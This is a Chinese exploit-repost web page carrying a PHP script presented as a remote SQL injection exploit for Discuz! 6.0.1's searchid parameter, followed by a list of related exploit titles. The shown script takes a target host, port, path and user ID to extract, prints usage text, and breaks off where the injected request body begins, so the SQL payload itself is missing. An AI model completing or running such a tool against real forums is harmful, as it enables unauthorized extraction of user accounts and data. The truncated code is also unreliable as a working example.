手机
当前位置:查字典教程网 >网络安全 >Exploit >Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
摘要:

<?php

error_reporting(E_ALL&E_NOTICE);

print_r("

------------------------------------------------------------------

Exploit discuz6.0.1

Just work as php>=5 & mysql>=4.1

BY james

------------------------------------------------------------------

");

if($argc>4)

{

$host=$argv[1];

$port=$argv[2];

$path=$argv[3];

$uid=$argv[4];

}else{

echo "Usage: php ".$argv[0]." host port path uidn";

echo "host: target server n";

echo "port: the web port, usually 80n";

echo "path: path to discuzn";

echo "uid : user ID you wanna getn";

echo "Example:rn";

echo "php ".$argv[0]." localhost 80 1n";

exit;

}

$content ="action=search&searchid=22

【Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit】相关文章:

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

Dana IRC 1.4a Remote Buffer Overflow Exploit

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

minb 0.1.0 Remote Code Execution Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

Joomla Component DT Register Remote SQL injection Vulnerability

trixbox (langChoice) Local File Inclusion Exploit (connect-back)

The Personal FTP Server 6.0f RETR Denial of Service Exploit

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

精品推荐
分类导航